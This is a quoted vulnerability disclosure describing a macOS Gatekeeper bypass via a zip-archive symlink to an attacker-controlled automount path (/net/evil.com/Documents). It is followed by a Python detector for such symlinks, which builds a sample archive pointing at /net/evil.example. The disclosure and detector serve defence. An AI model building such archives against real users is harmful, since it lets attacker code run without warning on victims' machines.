Filippo Cavallarin (Hacker News):
To better understand how this exploit works, let us consider the following scenario:
An attacker crafts a zip file containing a symbolic link to an automount endpoint that he/she controls (e.g. Documents -> /net/evil.com/Documents) and sends it to the victim.
The victim downloads the malicious archive, extracts it and follows the symlink.
Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (hiding .app extensions, hiding the full path from the title bar) makes this technique very effective and hard to notice.
The vendor was contacted on February 22, 2019 and is aware of this problem. This issue was supposed to be addressed, according to the vendor, by May 15, 2019, but Apple started dropping my emails. Since Apple is aware of my 90-day publication deadline, I am publishing this information.
These controls are in any case performed only when an app is run via LaunchServices, i.e. Finder. So a user should not be able to run an app with a corrupted signature from a new location using the Finder, but they can run an app with no signature at all, and any malicious script or process can run code from an app with a corrupted signature without the signature checks being performed, unless it is kind enough to ask for them.
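As an added example (not code from the advisory, from Apple, or from any of the quoted authors), here is a Python check that inspects a zip archive before extraction and flags symlink entries whose target lies under an automounter root such as /net/, which is the ingredient the scenario above relies on; the sample archive and the host name evil.example are constructed for the demonstration.

```python
import io
import stat
import zipfile

# Automounter roots that macOS maps by default (see /etc/auto_master):
# following a symlink into one of these triggers a network mount.
AUTOMOUNT_PREFIXES = ("/net/", "/home/")


def is_symlink_entry(info: zipfile.ZipInfo) -> bool:
    """Unix mode bits of a zip entry live in the top 16 bits of external_attr."""
    mode = info.external_attr >> 16
    return stat.S_ISLNK(mode)


def find_automount_symlinks(zip_bytes: bytes) -> list[tuple[str, str]]:
    """Return (entry name, link target) for every symlink entry whose target
    starts with an automount root. The stored body of a symlink entry is the
    target path itself, so nothing has to be extracted to disk to check it."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not is_symlink_entry(info):
                continue
            target = zf.read(info).decode("utf-8", "replace")
            if target.startswith(AUTOMOUNT_PREFIXES):
                hits.append((info.filename, target))
    return hits


def build_sample_zip() -> bytes:
    """Constructed sample archive: one harmless file plus a symlink named
    'Documents' that points at a hypothetical automount path."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "nothing to see here\n")
        link = zipfile.ZipInfo("Documents")
        link.external_attr = (stat.S_IFLNK | 0o777) << 16  # mark entry as symlink
        zf.writestr(link, "/net/evil.example/Documents")   # body = link target
    return buf.getvalue()


if __name__ == "__main__":
    for name, target in find_automount_symlinks(build_sample_zip()):
        print(f"suspicious symlink: {name} -> {target}")
```

The same check can be applied after extraction with os.lstat and os.readlink, but scanning the archive first avoids creating the link at all.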